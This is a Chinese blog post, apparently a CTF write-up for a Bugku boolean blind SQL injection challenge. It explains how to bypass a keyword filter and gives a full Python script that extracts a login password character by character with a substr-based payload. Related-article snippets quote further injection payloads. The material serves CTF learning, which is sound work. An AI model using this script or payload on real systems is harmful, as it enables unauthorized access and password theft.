Bugku WEB sql注入

最新推荐文章于 2024-04-18 14:15:58 发布
最新推荐文章于 2024-04-18 14:15:58 发布
阅读量563 收藏 4
点赞数
分类专栏: BUGKU 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41696858/article/details/119140435
版权

明显的布尔盲注。md5值和之前的一样,bugkuctf
这题也是过waf题,具体过滤了哪些字符可以用burpsuite跑个字典看看。
然后就是#,substr这两个关键的函数没有进行过滤,那么可以根据这个构造payload,由于空格被过滤了,所以,考虑用()代替空格
把上一题的脚本改改,爆破出密码来,那就可以直接提交得到flag了

import  requests
string_all="0123456789abcdefghijklmnopqrstuvwxyz"
url="http://114.67.246.176:12456/"
flag=""
fla=0
r=requests.session()
for i in range(1,50):
    for j in string_all:
        j=j+flag
        payload="din'or(!(substr((password)from({0}))<>'{1}'))#".format((-i), j)
        data={
            "username":payload,
            "password":"admin",
        }
        response=r.post(url,data=data)
        print(payload)
        if "password error" in response.text:
            print(flag)
            flag=j
            print(flag+"this cycle is finished with right result")
            break
        elif j[0]=='z':
            print(flag + "this cycle is finished with the end")
            fla=1
            break
    if fla==1:
        break
print("password is"+flag)

视频参考链接:https://www.bilibili.com/video/BV1Pg41177wb

显哥无敌
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BugKu-SQL注入2
u013622866的博客
05-07 410
题目链接 戳我 简单尝试 首先当然是去试试万能密码了,emmmm,全被过滤了...... 试试弱口令呢? admin admin admin 123456 admin123 admin123 ... ... 然后,竟然还是弱口令.......(admin|admin123),但我岂能就这么放过它,嘿嘿,开始手注 题目给除了一些已经过滤的字符,通过尝试,发现并不...
bugku web题INSERT INTO注入.docx
05-16
本文档中的“bugku web题INSERT INTO注入”是一个典型的利用SQL注入漏洞进行攻击的例子。题目提供了一个简单的PHP程序,通过分析该程序可以学习如何发现并利用HTTP头部`X-Forwarded-For`中的SQL注入漏洞。 #### 二...
Bugku sql注入
m0_63253040的博客
07-26 1077
过滤了length,like,information,and,union,select,order,where等等。得到数据库后面因为fuzz后发现过滤了太多字符,所以这里根据。用括号绕过空格,我们发现能用的字符有,or,'得到数据表admin和字段名password后。先万能密码试试看,是不等于的意思。是用字典跑出数据表和字段,这里先跳过。提示这题布尔盲注,先fuzz一波。可以确定这里有布尔盲注。去登录账号是admin。最后利用脚本爆出数据库。得到密码bugctf。进入环境是个登录页面。...
bugku--SQL注入((利用脚本))
hxhabcd123的博客
08-28 1686
本文记录利用脚本来解决SQL注入的CTF题
sql注入——bugku
weixin_34417814的博客
07-12 214
刚刚做了bugku的题目,现在整理一下 写出解题思路,希望能够帮助到那些需要帮助的人 所有的wp都是以一题一篇的形式写出 主要是为了能够让读者更好的阅读以及查找, 希望你们不要责怪!!共勉!!! 永远爱你们的————新宝宝 Challenge 1345 Solves sql注入 50 http://103.238.2...
bugku-web-SQL注入
最新发布
qq_75121443的博客
04-18 181
这里利用ASCII码对数据库名称进行提取,得到第一个为ASCII码99,得到为字母b。得到=、空格、and、+、,、()等关键字全被过滤。这里稍微测试后,直接得到正确账号名admin。这也太过分了,连逗号都过滤了。,可以使用from(1)解决。以此继续,得到password。空格可以使用or()解决。
bugkuctf解题-WEB
05-04
常见的攻击方式包括SQL注入、XSS(跨站脚本攻击)、CSRF(跨站请求伪造)、文件包含漏洞、命令注入等。对于这些攻击,我们需要了解它们的工作原理和防御措施。 1. SQL注入:当用户输入的数据未经有效过滤或转义就...
sqli-labs(php7.3以上可运行)
01-29
每个级别都设计了一个具有不同安全漏洞的Web应用,用户可以通过尝试注入SQL语句来解密问题,从而深入理解SQL注入的各种技术和防御策略。 三、PHP与SQL注入 在PHP环境中,开发者通常使用预处理语句和参数绑定来防止...
ctf web培训资料pdf
10-06
通过url访问靶机web站点,观察页面中的功能点,对可能存在漏洞的页面进行探测。 常见的漏洞特征: SQL注入:www.example.com?id=1 文件包含:www.example.com?page=file1.php 文件上传
bugku笔记刷题目的整理
04-12
漏洞分类包括SQL注入、XSS跨站脚本、命令注入等,这些都是Web应用常见的安全漏洞类型,学习者需要掌握如何利用和防范这些漏洞。 在BugKu平台上,题目的难度通常从低到高逐步提升,涵盖基础的Web渗透测试技巧到高级...
Bugku sql注入 基于布尔的SQL盲注 经典题where information过滤
m0_64180167的博客
10-16 662
考核中遇到的题 爆出数据库 就完全不知道怎么做了这里拿到原题记录一下首先拿到登入界面我们来进行测试输入 admin 密码随便输入输入 admin123 密码随便输入发现了 这里admin是存在数据库中的 但是不存在就会回显不存在所以这里我们可以确定了 admin 是true的然后我们开始fuzz发现过滤了巨多。。。。。where information啥都是过滤然后我们一个一个绕过。
BugkuCTF sql注入
weixin_34413065的博客
05-04 305
前言 写了这么久的web题,算是把它基础部分都刷完了一遍,以下的几天将持续更新BugkuCTF WEB部分的题解,为了不影响阅读,所以每道题的题解都以单独一篇文章的形式发表,感谢大家一直以来的支持和理解,共勉~~~ 点开链接一看 很明显可以看出查询key表,id=1的string字段 我们去构造payload: http://103.238.227.13:10083/inde...
BugKusql注入
D-R0s1的博客
08-08 882
       今天和大家分享一道BugKu中关于sql注入的题目,在web题中,sql注入的相关知识可以说随处可见了,在这里咱们就就题论题不做其他的拓展和延伸了。        拿到题以后,还是老套路,and 1=1和and 1=2 看看是否带入查询,但是这个题目在?id=1和?id=1'两种条件下都不报错,查看页面源代码发现gb2312于是尝试宽字节注入。?id=1%bf' union sel...
【CTF-webbugku-成绩查询(sql注入
Sankkl1的博客
08-17 617
再测试,当id为1’时,无数据,而当id为1’#时,又正确返回了数据,推测构造的数据库查询语句可能是类似。查询skctf库中的表的名称,结果其中有一个表名为fl4g,很可能其中就包含了flag。查询fl4g表中的列名,发现其中有一列的名称为skctf_flag。如上图所示,当id为1时返回名字为“龙龙龙”的成绩单。我们要找到能返回能够返回我们需要的信息的位置,当。时,数据不显示,可以知道一列数据有4列。时,我们可以查询到库名,如下图所示。这样的,其中XX为传入的参数。时,可以正常显示,直到。
Bugku SQL注入2
小白渣的博客
09-18 811
这道题目属实有点牛逼 1.直接 即可得到 flag 2.这加粗样式道题属于典型的DS_Store源码泄露,当然还有其他类型(常见web源码泄露总结)(常见的web源码泄露总结). 结果用御剑和bp爆口令好像都无果 ...
Bugku题解-Sql注入2(web
flying_bird2019的博客
12-05 407
sql注入2 题目不难,但是真的用了好长时间研究(主要原因是本地数据库和题目环境不太一样)这题真的是一言难尽。。不知道出题人nb还是sb。。。(我寻思这篇文章不能被他本人看到吧) 先来说一下非注入的解法 方法一 要拿到flag就得先用账户登录成功,flag并不在数据库里,我先尝试了用字典爆破admin密码,没想到竟然成功了??? 后来发现竟然是弱口令!!!uname=admin passwd=admin123 (ps:果然,只要是人写出来代码就有可能存在安全漏洞,这种非预期解出题人直接原地去世。。。后面还有
Bugku sql注入 基于布尔的SQL盲注
plant1234的博客
06-21 3411
sql注入
bugku成绩单(sql注入)writeup
热门推荐
xuchen16的博客
09-20 1万+
解法一:手工注入 输入1,2,3分别能查到1,2,3号学生的成绩   SQL注入应该没跑了   输入1'返回异常,输入1'--+返回异常,输入1' #或者1’-- +返回正常,看来过滤了--+   观察,表貌似有四列(名字,Math,English,Chinese),输入1' order by 4#返回正常,输入1' order by 5#返回异常,看来的确是4列   接下来就开始暴库名...
CTF学习之路---bugku WEB篇-SQL注入1(已挂)
踏坑的小白
01-03 738
SQL注入1(已挂) 因为题目挂了只能还原一下 进入题目 题目要求: 访问参数为:?id=x 查找表为key的数据表,id=1值hash字段值 代码 //过滤sql $array = array('table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','t...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值